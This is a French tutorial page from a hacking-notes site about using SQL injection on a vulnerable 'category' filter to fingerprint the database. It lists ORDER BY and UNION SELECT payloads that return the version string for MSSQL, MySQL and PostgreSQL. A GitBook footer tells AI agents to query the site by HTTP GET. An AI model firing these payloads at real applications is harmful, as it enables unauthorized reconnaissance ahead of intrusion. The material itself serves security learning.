> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/sql-injection/identifying-dbms-version-mysql-mssql-postgresql.md).

# Détection de la version du SGBD (MySQL, MSSQL, PostgreSQL)

### Attaque par injection SQL, interrogation du type et de la version de la base de données sur MySQL et Microsoft

* **Contexte / vulnérabilité :** `category` filtre vulnérable à l’injection SQL ; l’application concatène la valeur utilisateur dans `WHERE` la clause. En utilisant `ORDER BY` / `UNION` permet d’énumérer le nombre de colonnes puis d’extraire une valeur de version.
* **Objectif :** afficher la chaîne de version du SGBD.
* **Méthodologie rapide :**

1. **Déterminer le nombre de colonnes**:/ Charge utile :

   ```sql
   ' ORDER BY 2-- -
   ' ORDER BY 3-- -
   ```

* (augmentez l’index jusqu’à ce qu’il provoque une erreur afin de trouver le nombre exact de colonnes).

2. **Valider UNION** (choisir un `UNION SELECT` avec le même nombre de colonnes) : / Exemple minimal à 2 colonnes :

   ```sql
   ' UNION SELECT '1','2'-- -
   ```
3. **Récupérer la version** — utilisez la fonction/la variable adaptée au moteur.

**Charges utiles cibles :**

* **Microsoft SQL Server (MSSQL)** — variable système : `@@version`

  ````
      ```sql
      ' UNION SELECT '1', @@version-- -
      ```
  *   **MySQL** — fonction : `version()` (ou variable `@@version`)

      ```sql
      ' UNION SELECT '1', version()-- -
      ' UNION SELECT '1', @@version-- -
      ```
  *   **PostgreSQL** — fonction : `version()`

      ```sql
      ' UNION SELECT '1', version()-- -
      ```
  ````

> Ajustez le nombre de colonnes et l’ordre des colonnes en fonction de la requête vulnérable (p. ex. UNION SELECT NULL, version() si les types diffèrent). Utilisez NULL pour les colonnes dont le type ne doit pas correspondre, si nécessaire.

* **Interprétation :** La page affichera la chaîne renvoyée par `@@version` / `version()` (p. ex. `Microsoft SQL Server 2019 (RTM) - 15.x...`, `5.7.33-0ubuntu0.18.04.1`, `PostgreSQL 13.3 sur x86_64-...`), ce qui permet l’empreinte du SGBD.
* **Impact :** divulgation d’informations utile pour cibler des exploits spécifiques à la version, risque accru d’attaques ultérieures.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/sql-injection/identifying-dbms-version-mysql-mssql-postgresql.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
